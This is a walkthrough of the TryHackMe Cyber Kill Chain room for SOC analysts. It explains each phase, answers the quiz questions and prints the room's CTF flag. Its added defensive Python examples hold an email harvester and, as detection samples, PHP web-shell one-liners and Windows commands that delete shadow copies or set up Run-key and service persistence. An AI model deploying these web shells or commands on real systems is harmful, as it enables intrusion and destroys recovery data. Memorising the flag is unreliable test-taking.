TryHackMe: Cyber Kill Chain Walkthrough (SOC Level 1)

Today we will have a look at the Cyber Kill Chain room on TryHackMe. The Cyber Kill Chain framework is designed for the identification and prevention of network intrusions. We will learn what adversaries need to do in order to achieve their goals. This room is part of the SOC Level 1 Path.

Cyber Kill Chain Room

I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from these challenges on HTB and THM. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/r/room/cyberkillchainzmt




Task 1: Introduction

This task introduces the room. The Cyber Kill Chain can help us understand and protect against ransomware attacks, security breaches as well as Advanced Persistent Threats (APTs). You can use the Cyber Kill Chain to assess your network and system security by identifying missing security controls and closing certain security gaps based on your company’s infrastructure.

The following attack phases will be covered:

  • Reconnaissance
  • Weaponization
  • Delivery
  • Exploitation
  • Installation
  • Command & Control
  • Actions on Objectives

Questions

Read the above.

Nothing else to discuss here, so let’s move on!

Answer: No answer needed


Task 2: Reconnaissance

Reconnaissance

  • First phase of an attack: adversaries gather info on infrastructure, employees, and technologies.
  • Can be passive (WHOIS lookups, social media scraping and other public sources, which send no traffic to the target) or active (port scanning, social engineering, which touch the target and can be logged or noticed).
  • Good recon → targeted, believable attacks.

OSINT

  • Publicly available intelligence from search engines, social media, forums, records, WHOIS, etc.
  • Used to craft attacks like phishing.

Email Harvesting

Collecting email addresses for phishing campaigns.

OSINT Framework → directory of OSINT tools.

theHarvester → emails, names, subdomains, IPs.

Hunter.io → domain‑linked contacts.
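To make the email-harvesting step concrete, here is an added example in Python that is my own illustration and not code from the room or from theHarvester. It does, over a handful of constructed page snippets, what theHarvester does against search-engine results: extract addresses and hostnames, fold the common user (at) domain (dot) com obfuscation back into an address, and keep only what belongs to the target domain. The page texts, URLs and the domain example.com are made up for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: text as it might come back from search results or
# scraped public pages. None of it is real data.
SAMPLE_PAGES = {
    "https://www.example.com/contact": """
        Press enquiries: press@example.com. Careers: jobs@Example.com
        Our CDN lives at static.example.com and the VPN portal at vpn.example.com.
    """,
    "https://forum.example.net/thread/42": """
        Posted by j.doe@example.com -- mail me at j.doe(at)example(dot)com if the
        link is dead. Unrelated: admin@other-company.org, noreply@mail.example.com
    """,
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# "user (at) host (dot) tld" is a common anti-scraping obfuscation
OBFUSCATED_RE = re.compile(
    r"([A-Za-z0-9._%+-]+)\s*\(at\)\s*([A-Za-z0-9.-]+)\s*\(dot\)\s*([A-Za-z]{2,})", re.I
)
HOST_RE = re.compile(r"\b((?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})\b")


def in_scope(name: str, domain: str) -> bool:
    """True if name is the target domain itself or a subdomain of it."""
    return name == domain or name.endswith("." + domain)


def harvest(pages: dict, domain: str):
    """Return (emails, hosts) belonging to `domain`, found across the page texts."""
    domain = domain.lower()
    emails, hosts = set(), set()
    for url, text in pages.items():
        # rebuild obfuscated addresses first so the email regex can see them
        text = OBFUSCATED_RE.sub(lambda m: f"{m.group(1)}@{m.group(2)}.{m.group(3)}", text)
        for addr in EMAIL_RE.findall(text):
            addr = addr.lower()
            if in_scope(addr.split("@", 1)[1], domain):
                emails.add(addr)
        for host in HOST_RE.findall(text):
            host = host.lower()
            if in_scope(host, domain):
                hosts.add(host)
        # the page's own hostname is a subdomain worth recording too
        page_host = (urlparse(url).hostname or "").lower()
        if in_scope(page_host, domain):
            hosts.add(page_host)
    return sorted(emails), sorted(hosts)


if __name__ == "__main__":
    found_emails, found_hosts = harvest(SAMPLE_PAGES, "example.com")
    print("emails:", found_emails)
    print("hosts: ", found_hosts)
```

Everything here runs offline on the embedded text; pointing it at real search results or crawled pages is where a tool like theHarvester adds its source modules. The scope check is a suffix match on the domain, so something like example.com.evil.org is excluded while static.example.com is kept.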

Questions

What is the name of the Intel Gathering Tool that is a web-based interface to the common tools and resources for open-source intelligence?

Of the three tools mentioned in the task, OSINT Framework is the one that is not a single tool but a web-based collection of OSINT tools and resources.

Answer: OSINT Framework

What is the definition for the email gathering process during the stage of reconnaissance?

We call this email gathering process email harvesting.

Answer: email harvesting


Task 3: Weaponization

That was it for reconnaissance. Let’s move on to the next phase: Weaponization. After enough information is gathered, the attacker creates or acquires the tooling, typically an exploit paired with a payload, to deliver malicious code without directly engaging the victim.

Key terms:

  • Malware: a program or software that is designed to damage, disrupt, or gain unauthorized access to a computer.
  • Exploit: Code that takes advantage of a vulnerability in order to run the attacker’s payload.
  • Payload: Malicious code executed on the target system.

Examples of Weaponization:

  • Embedding malicious macros or VBA scripts into Microsoft Office documents.
  • Using USB drives to spread infected payloads.
  • Leveraging Command and Control (C2) techniques to execute commands or deliver further payloads remotely.
  • Employing backdoors to bypass security and maintain system access.
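Since macro-laden Office documents are the most common weaponized artefact in the list above, here is an added Python example of the check a mail gateway or SOC analyst can run on a suspicious attachment. It is my own illustration, not code from the room. Modern Office files (.docx, .docm, .xlsm and so on) are ZIP containers following the OOXML packaging format; a VBA project is stored as a separate part (normally word/vbaProject.bin) and declared in [Content_Types].xml, so the container contents rather than the file extension tell you whether macros are present. The sample document is constructed in memory with only the parts needed for the check; real files carry many more parts.

```python
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # header of an OLE2 compound file
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def build_sample_doc(with_macro: bool) -> bytes:
    """Constructed stand-in for a Word OOXML file: a ZIP holding only the
    parts this check looks at. Real documents contain many more parts."""
    main_ct = (
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
        + (".macroEnabled" if with_macro else "") + ".main+xml"
    )
    overrides = [f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>']
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            overrides.append(
                f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
            )
            # a real vbaProject.bin is an OLE2 compound file; only its header is mimicked here
            z.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 64)
        z.writestr(
            "[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            + "".join(overrides) + "</Types>",
        )
    return buf.getvalue()


def macro_indicators(data: bytes) -> list:
    """Inspect an OOXML container and return the macro indicators found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        for name in names:
            # the VBA project is stored as its own part, whatever the file extension says
            if name.lower().endswith("vbaproject.bin"):
                findings.append(f"VBA project part present: {name}")
                if z.read(name).startswith(OLE2_MAGIC):
                    findings.append(f"{name} has an OLE2 header (real VBA storage, not a decoy)")
        if "[Content_Types].xml" in names:
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            if VBA_CONTENT_TYPE in ct:
                findings.append("content types declare a vbaProject part")
            if "macroEnabled" in ct:
                findings.append("main part is declared macro-enabled")
    return findings


def has_macros(data: bytes) -> bool:
    return bool(macro_indicators(data))


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_doc(False)), ("macro", build_sample_doc(True))):
        print(label, "->", macro_indicators(doc) or "no macro indicators")
```

The extension is deliberately not consulted: a renamed file still carries its vbaProject part. For real-world triage, oletools (olevba) also extracts and de-obfuscates the macro source and handles the legacy binary .doc/.xls formats, which are OLE2 compound files themselves rather than ZIP containers.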

Questions

What is the term for automated scripts embedded in Microsoft Office documents that can be used to perform tasks or exploited by attackers for malicious purposes?

Well, this is very specific to Microsoft Office documents, but if you have some basic experience with these tools, you probably know the answer: macro.

Answer: Macro


Task 4: Delivery

Delivery is all about deciding the method for transmitting the payload or the malware to the target.

Common methods include:

  • Phishing Emails: Crafting fake emails to trick victims into opening malicious attachments or links.
  • Infected USB Drives: Leaving malware-laden USBs in public areas or mailing them with a company logo to look legitimate, tricking employees into using them.
  • Watering Hole Attacks: Compromising a website frequently visited by the target group, redirecting visitors to malicious sites. Victims unknowingly download malware through fake pop-ups or malicious browser extensions, known as drive-by downloads.

These strategies allow attackers to deliver their payloads discreetly, setting the stage for further exploitation.

Questions

What do you call an attack targeting a specific group by infecting their frequently visited website?

As discussed earlier, the type of attack described is called a watering hole attack.

Answer: Watering hole attack


Task 5: Exploitation

Exploitation occurs when an attacker’s code executes on a target by leveraging vulnerabilities.

Techniques used:

  • Malicious macros: Often delivered via phishing emails; the payload (for example ransomware) runs when the document is opened and macros are enabled.
  • Zero-day exploits: Target flaws unknown to the vendor, so no patch exists yet and signature-based tools have nothing to match.
  • Known CVEs: Exploit publicly disclosed but unpatched vulnerabilities.

Post-access actions: Attackers may escalate privileges or move laterally across systems and networks.

Indicators of exploitation:

  • Suspicious command-line arguments in logs.
  • Unexpected processes starting.
  • Registry modifications or creation of new services.

Questions

What is the term for a cyber attack that exploits a software vulnerability that is unknown by software vendors?

Another easy one, which we just covered. A vulnerability that exists in a piece of software without being known to the antivirus or software vendors is called a zero-day vulnerability.

Answer: Zero-day


Task 6: Installation

In the Installation phase, after gaining access to a system, an attacker will typically install a persistent backdoor to maintain access even if the initial connection is lost, the exploited vulnerability is patched, or the original foothold is detected and removed.

Persistence can be achieved through several techniques:

  • Web Shells: Malicious scripts (e.g., ASP, PHP, JSP) placed on web servers to maintain access. They are hard to spot because they are ordinary script files of the same type the application already uses and are often only a line or two long.
  • Backdoors on Victim Machines: Tools like Meterpreter (from the Metasploit Framework) allow attackers to maintain an interactive shell and remotely execute malicious code.
  • Modifying Windows Services: Attackers can create or alter services to run malicious scripts or payloads regularly. Built-in tools like sc.exe and reg.exe are used to manipulate service configurations.
  • Registry/Startup Folder Persistence: By adding the malicious payload to the Windows Registry or Startup Folder, the attacker ensures it runs each time the victim logs in.

To avoid detection, attackers may use the Timestomping technique, modifying the timestamps of files to make them appear legitimate and evade forensic analysis.
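As an added example (my own, not from the room), here is a small Python triage script for the web-shell case above. Because a timestomped shell blends in when you sort a web root by modification time, it scores file contents and locations instead: calls to command-execution functions, eval on decoded input, request superglobals feeding them, error suppression, and scripts living in upload or cache directories or hidden behind a leading dot. The four PHP files and their paths are constructed for the example, and the rule weights are my own choices.

```python
import re
from posixpath import basename

# Constructed PHP files as they might sit on a compromised server (not real samples).
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php include 'config.php'; echo render_page($_GET['page'] ?? 'home'); ?>",
    "/var/www/html/about.php": "<?php echo 'About us'; ?>",
    "/var/www/html/uploads/avatar.php": "<?php @eval(base64_decode($_POST['k'])); ?>",
    "/var/www/html/cache/.x.php": "<?php $c = $_REQUEST['cmd']; system($c); ?>",
}

# (rule name, pattern, weight). Weights are hand-picked for this example.
CONTENT_RULES = [
    ("command-execution", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I), 3),
    ("eval", re.compile(r"\beval\s*\(", re.I), 3),
    ("decoder-before-execution", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"), 1),
    ("error-suppression", re.compile(r"@\s*(eval|system|exec|shell_exec|passthru)\b", re.I), 1),
]
# directories that are normally writable by the web server but should not hold code
SUSPECT_DIRS = {"uploads", "upload", "cache", "tmp", "temp", "images"}


def score_file(path: str, content: str):
    """Return (score, [reasons]) for one file."""
    score, reasons = 0, []
    for name, pattern, weight in CONTENT_RULES:
        if pattern.search(content):
            score += weight
            reasons.append(name)
    if any(part in SUSPECT_DIRS for part in path.split("/")[:-1]):
        score += 2
        reasons.append("script-in-upload-or-cache-dir")
    if basename(path).startswith("."):
        score += 2
        reasons.append("hidden-file")
    return score, reasons


def scan(files: dict, threshold: int = 5) -> dict:
    """Return {path: (score, reasons)} for files scoring at or above the threshold."""
    hits = {}
    for path, content in files.items():
        score, reasons = score_file(path, content)
        if score >= threshold:
            hits[path] = (score, reasons)
    return hits


if __name__ == "__main__":
    for path, (score, reasons) in scan(SAMPLE_FILES).items():
        print(f"{score:2d}  {path}  {', '.join(reasons)}")
```

Scoring is cumulative on purpose: a single suspicious token in a legitimate file (index.php reads $_GET but scores only 1) does not fire, while a one-liner with eval(base64_decode($_POST[...])) in an upload directory does. In practice, pair this with a comparison of the web root against the deployed release (package manifest or git tree) and with access logs showing POST requests to files nothing links to.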

Questions

What technique is used to modify file time attributes to hide new or changes to existing files?

This technique is called Timestomping. This is used to evade forensic analysis.

Answer: Timestomping

What malicious script can be planted by an attacker on the web server to maintain access to the compromised system and enables the web server to be accessed remotely?

A web shell is a malicious script written in web development programming languages such as ASP, PHP, or JSP used by an attacker to maintain access to the compromised system.

Answer: Web shell


Task 7: Command & Control

In the C2 (Command and Control) phase, the attacker (the room calls him “Megatron”) establishes a communication channel with the victim’s system to control it remotely. The infected machine checks in with the attacker’s C2 server at regular intervals to fetch instructions, which is known as C2 beaconing, and through this channel the attacker gains full control of the compromised system.

Traditional C2 channels like IRC have largely been replaced because they are easy for security tools to detect. More common modern C2 channels include:

  • HTTP (port 80) and HTTPS (port 443): These protocols blend malicious traffic with legitimate traffic, helping the attacker evade firewalls.
  • DNS (Domain Name System): The compromised machine sends frequent DNS requests to a domain whose authoritative server is controlled by the attacker; commands and data are encoded in the query names and responses. This method is known as DNS Tunneling.

It is important to note that the C2 infrastructure may be owned by the adversary or may itself be another compromised host used as a relay.
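The DNS tunnelling and beaconing behaviour described above leaves a characteristic pattern in resolver logs, which is what a SOC analyst looks for. As an added example (my own code, not from the room), the Python below groups queries by client and registered domain and flags the combination of clockwork-regular intervals, long high-entropy leftmost labels and a stream of never-repeating subdomains. The log lines, client addresses and the domain badc2.net are constructed; registered_domain() naively takes the last two labels, an assumption made to keep the example offline (real code should consult the public suffix list).

```python
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime

# Constructed resolver log: "timestamp client query_name record_type". Not real traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 www.example.com A
2024-05-01T10:00:01 10.0.0.5 cdn.example.com A
2024-05-01T10:00:00 10.0.0.9 7a3f9c1e2b4d6f80.t.badc2.net TXT
2024-05-01T10:01:00 10.0.0.9 9e8d7c6b5a4f3e2d.t.badc2.net TXT
2024-05-01T10:02:00 10.0.0.9 1f2e3d4c5b6a7988.t.badc2.net TXT
2024-05-01T10:03:00 10.0.0.9 c0ffee00deadbeef.t.badc2.net TXT
2024-05-01T10:04:00 10.0.0.9 0badf00d1badf00d.t.badc2.net TXT
2024-05-01T10:04:30 10.0.0.5 mail.example.com MX
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; random hex tends towards 4, English words sit lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    # Assumption: last two labels. Real code should use the public suffix list (co.uk etc.).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log_text: str) -> dict:
    """Return {(client, domain): [flags]} for groups showing tunnelling/beaconing traits."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, _rtype = line.split()
        groups[(client, registered_domain(qname))].append((datetime.fromisoformat(ts), qname.lower()))

    alerts = {}
    for key, entries in groups.items():
        entries.sort()
        times = [t for t, _ in entries]
        labels = [q.split(".")[0] for _, q in entries]   # leftmost label carries tunnelled data
        flags = []
        if len(times) >= 4:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mean_gap = statistics.mean(gaps)
            # coefficient of variation near zero means a fixed beacon interval
            if mean_gap > 0 and statistics.pstdev(gaps) / mean_gap < 0.15:
                flags.append("regular-interval")
        if statistics.mean([len(label) for label in labels]) >= 12:
            flags.append("long-labels")
        if shannon_entropy("".join(labels)) >= 3.2:
            flags.append("high-entropy-labels")
        unique = len({q for _, q in entries})
        if unique >= 5 and unique / len(entries) >= 0.9:
            flags.append("many-unique-subdomains")
        if len(flags) >= 2:
            alerts[key] = flags
    return alerts


if __name__ == "__main__":
    for (client, domain), flags in analyze(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {', '.join(flags)}")
```

The thresholds are illustrative. CDN hostnames, antivirus cloud lookups and some telemetry services also produce long random-looking labels, so in a real environment baseline per domain first and weight the interval regularity and the volume of unique names more than entropy alone.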

Questions

What is the C2 communication where the victim makes regular DNS requests to a DNS server and domain which belong to an attacker?

The process where the victim makes regular DNS requests to a DNS server controlled by the attacker is called DNS Tunneling. The DNS server is used to control the compromised host.

Answer: DNS Tunneling


Task 8: Actions on Objectives (Exfiltration)

This phase allows the attacker to fulfill their objectives and ensure maximum disruption or data theft. Examples of this are:

  • Collecting credentials from users to gain further access.
  • Performing privilege escalation to gain elevated access, such as domain administrator privileges, often by exploiting misconfigurations.
  • Internal reconnaissance to interact with internal software and find vulnerabilities.
  • Lateral movement to expand control within the company’s network.
  • Collecting and exfiltrating sensitive data, which could include intellectual property or personal information.
  • Deleting backups and shadow copies (backup snapshots created by Microsoft technologies), which would hinder the company’s ability to recover.
  • Overwriting or corrupting data to cause further damage or prevent recovery.
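Several of the indicators in this room show up in the same telemetry: the suspicious command lines and unexpected child processes from the Exploitation task, the sc.exe and reg.exe persistence from the Installation task, and the shadow-copy deletion listed above. Here is one added Python example (my own, not from the room) that tags each process-creation event with the kill chain phase it most likely belongs to. The events are constructed in the shape of Sysmon Event ID 1 fields flattened to one line per event; the host name, paths and the encoded command fragment are made up.

```python
import re
from posixpath import basename

# Constructed process-creation events: "timestamp|host|parent_image|image|command_line".
# Not real telemetry; the encoded PowerShell fragment is a made-up placeholder.
SAMPLE_EVENTS = r"""
2024-05-01T09:12:03|WS-17|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-05-01T09:12:07|WS-17|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\reg.exe|reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\bob\AppData\Roaming\upd.exe
2024-05-01T09:12:09|WS-17|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc create svcupd binPath= C:\Users\bob\AppData\Roaming\upd.exe start= auto
2024-05-01T09:30:00|WS-17|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet
2024-05-01T09:31:00|WS-17|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" /n C:\Users\bob\Documents\report.docx
2024-05-01T09:32:00|WS-17|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def exe(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return basename(path.replace("\\", "/")).lower()


def parse_event(line: str) -> dict:
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": exe(parent), "image": exe(image), "cmdline": cmdline}


def office_spawns_script_host(e: dict) -> bool:
    # a document should render text, not launch an interpreter
    return e["parent"] in OFFICE_APPS and e["image"] in SCRIPT_HOSTS


def encoded_or_hidden_powershell(e: dict) -> bool:
    return e["image"] in {"powershell.exe", "pwsh.exe"} and re.search(
        r"(?i)\s-(?:e|en|enc|encodedcommand)\s|\s-w(?:indowstyle)?\s+hidden\b", e["cmdline"]) is not None


def run_key_persistence(e: dict) -> bool:
    return e["image"] == "reg.exe" and re.search(
        r"(?i)\badd\b.*\\CurrentVersion\\Run(?:Once)?\b", e["cmdline"]) is not None


def service_persistence(e: dict) -> bool:
    return e["image"] == "sc.exe" and re.search(
        r"(?i)\b(?:create|config)\b.*\bbinpath=", e["cmdline"]) is not None


def shadow_copy_deletion(e: dict) -> bool:
    c = e["cmdline"]
    return (e["image"] == "vssadmin.exe" and re.search(r"(?i)delete\s+shadows", c) is not None) or \
           (e["image"] == "wmic.exe" and re.search(r"(?i)shadowcopy\s+delete", c) is not None)


# (rule name, kill chain phase, predicate)
RULES = [
    ("office-spawns-script-host", "Exploitation", office_spawns_script_host),
    ("encoded-or-hidden-powershell", "Exploitation", encoded_or_hidden_powershell),
    ("run-key-persistence", "Installation", run_key_persistence),
    ("service-persistence", "Installation", service_persistence),
    ("shadow-copy-deletion", "Actions on Objectives", shadow_copy_deletion),
]


def detect(events_text: str) -> list:
    """Return one alert dict per (event, matching rule), in event order."""
    alerts = []
    for line in events_text.strip().splitlines():
        e = parse_event(line)
        for name, phase, pred in RULES:
            if pred(e):
                alerts.append({"ts": e["ts"], "host": e["host"], "image": e["image"],
                               "rule": name, "phase": phase})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['host']} [{a['phase']}] {a['rule']} ({a['image']})")
```

Command-line matching is brittle on its own: attackers rename tools, call the underlying APIs directly, or use wmic instead of vssadmin, so corroborate with the registry and service telemetry itself (Windows System log Event ID 7045 for a newly installed service, Sysmon Event ID 13 for Run key writes). The phase label is what makes the output useful for the kind of mapping exercise Task 9 asks for.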

Questions

What technology is included in Microsoft Windows that can create backup copies or snapshots of files or volumes on the computer, even when they are in use? 

Shadow copies are backup snapshots created in Microsoft Windows.

Answer: Shadow Copy


Task 9: Practice Analysis

The infamous Target cyber-attack, which led to one of the largest data breaches in history, began on November 27, 2013.

On December 19th, 2013, Target released a statement confirming the breach, stating that approximately 40 million credit and debit card accounts were impacted between Nov. 27 and Dec. 15, 2013. Target later paid $18.5 million under the terms of a multistate settlement agreement, at the time the largest data-breach settlement in history.

Deploy the static site attached to this task and apply your new skills.
The assignment is to add each item on the following list to the correct Kill Chain phase.

Exploit public-facing application (Exploitation Phase)

Exploiting a public-facing application is part of the Exploitation phase (laptop icon). This one needs no further explanation.

Data from local system (Exfiltration Phase)

Exfiltration of data from the local system is one of the possible goals of the attacker, and therefore part of the Exfiltration phase, represented by the target icon.

PowerShell (Weaponization Phase)

This fits into the weaponization phase (the ladybug icon). I suppose it refers to malware that is delivered with a PowerShell payload exploiting a vulnerability in the target system.

Dynamic linker hijacking (Installation Phase)

Adversaries may execute their own malicious payloads by hijacking the environment variables the dynamic linker uses to load shared libraries (LD_PRELOAD on Linux, for example). Because the hook fires every time a program is loaded, it gives the attacker a persistent backdoor for regaining access to the compromised system, so this belongs to the Installation phase, represented by the opened box icon.

Spearphishing attachment (Delivery Phase)

“Spear phishing” is a type of phishing campaign that targets a specific person or group and often will include information known to be of interest to the target, such as current events or financial documents. This is the method of delivery and therefore part of the delivery phase (the box icon).

Fallback channels (Command & Control Phase)

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control. This is part of the Command & Control phase, represented by the megaphone icon.

Questions

What is the flag after you complete the static site?

To summarize, the correct answers are as follows:

Correct Kill Chain Phases

The flag is shown as soon as you submit the answers.

Answer: THM{7HR347_1N73L_12_4w35om3}


Task 10: Conclusion

The Cyber Kill Chain is a valuable tool for improving network defense, but it is not perfect and should not be the only tool relied upon. Here’s why:

  • Outdated Framework: The traditional Cyber Kill Chain, developed by Lockheed Martin in 2011, hasn’t seen significant updates. As a result, it can create security gaps, as the threats and tactics used by adversaries have evolved substantially.
  • Limited Scope: The traditional Kill Chain was primarily designed to secure the network perimeter and defend against malware threats. However, modern cybersecurity threats have become more complex, with adversaries often combining multiple TTPs (tactics, techniques, and procedures) to achieve their objectives. This makes the original framework less effective against evolving threats.
  • Adversaries Evolving: Attackers can bypass traditional defenses by modifying file hashes or IP addresses, rendering some traditional threat detection systems ineffective. To counter this, AI and new algorithms are being developed to detect even the slightest suspicious changes.
  • Insider Threats: The traditional Cyber Kill Chain is not well-equipped to handle Insider Threats, which can be difficult to detect as they involve individuals who already have authorized access to an organization’s systems. According to the CISA, insider threats involve using authorized access to harm the organization, and this doesn’t fit into the traditional Kill Chain model.

To create a more robust defense strategy, it is advisable to integrate the traditional Cyber Kill Chain with other models, such as:

  • MITRE ATT&CK, which provides a comprehensive mapping of adversary behavior and tactics across all stages of an attack.
  • The Unified Kill Chain, which expands upon the traditional framework and is better suited to deal with modern threats, including insider threats.

By combining multiple frameworks, organizations can ensure a more holistic and adaptive approach to cybersecurity.

Questions

Read the above.

Answer: No answer needed


Congratulations on completing Cyber Kill Chain!!!

Cyber Kill Chain Completed

We are done. Great job!

This was another great room to learn about some of the methodology related to the work of a SOC Analyst. Great job on following along. Happy hacking!

Read the other walkthroughs of the SOC Level 1 Path here.

Find more of my walkthroughs here.


Like my articles?

You are welcome to share my article with a friend or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg
